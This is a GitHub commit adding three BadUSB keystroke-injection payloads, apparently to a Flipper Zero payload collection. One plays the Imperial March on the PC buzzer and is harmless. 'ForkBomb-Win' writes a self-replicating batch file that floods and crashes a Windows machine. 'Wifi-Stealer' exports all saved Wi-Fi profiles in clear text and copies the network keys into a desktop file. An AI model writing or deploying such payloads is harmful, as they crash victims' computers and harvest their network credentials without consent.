Added 3 payloads (thanks 7h30th3r0n3!)

This commit is contained in:
UberGuidoZ 2022-07-16 21:41:15 -07:00 committed by GitHub
parent a509a4e408
commit 20c654d732
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
3 changed files with 79 additions and 0 deletions

16
BadUSB/ForkBomb-Win.txt Normal file
View File

@ -0,0 +1,16 @@
REM Title: CMD forkbomb
REM Author: 7h30th3r0n3
REM Target: Tested on Windows 7/8/10/11
REM Version: 1.0
REM Category: Prank
REM Launches CMD and spawns a CMD forkbomb which create a waterfall of cmd and crash the pc
GUI r
DELAY 300
STRING cmd
ENTER
DELAY 300
STRING (echo :b && echo start b.bat && echo goto b)>b.bat
ENTER
DELAY 300
STRING b.bat
ENTER

50
BadUSB/Power-Imperial.txt Normal file
View File

@ -0,0 +1,50 @@
REM Title: Power Imperial
REM Author: 7h30th3r0n3
REM Target: Tested on Windows 7/8/10
REM Version: 1.0
REM Category: Prank
REM Launches Powershell and play Imperial theme with pc buzzer
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 500
STRING [console]::beep(440,500);
ENTER
STRING [console]::beep(440,500);
ENTER
STRING [console]::beep(440,500);
ENTER
STRING [console]::beep(349,350);
ENTER
STRING [console]::beep(523,250);
ENTER
STRING [console]::beep(440,500);
ENTER
STRING [console]::beep(349,350);
ENTER
STRING [console]::beep(523,250);
ENTER
STRING [console]::beep(440,500);
ENTER
DELAY 2000
STRING [console]::beep(659,500);
ENTER
STRING [console]::beep(659,500);
ENTER
STRING [console]::beep(659,500);
ENTER
STRING [console]::beep(698,350);
ENTER
STRING [console]::beep(523,250);
ENTER
STRING [console]::beep(415,500);
ENTER
STRING [console]::beep(349,350);
ENTER
STRING [console]::beep(523,250);
ENTER
STRING [console]::beep(440,500);
ENTER
STRING exit
ENTER

13
BadUSB/Wifi-Stealer.txt Normal file
View File

@ -0,0 +1,13 @@
REM Title: Wifi Stealer
REM Author: 7h30th3r0n3
REM Target: Tested on Windows 7/8/10/11
REM Version: 1.0
REM Category: Grabber
REM Extract SSID and wifi shared key and place it in a txt file nammed 0.txt on the desktop
GUI r
DELAY 300
STRING powershell
ENTER
DELAY 300
STRING cd Desktop;netsh wlan export profile key=clear;Select-String -Path Wi-Fi-* -Pattern 'keyMaterial'>0.txt;del Wi-Fi-*;exit
ENTER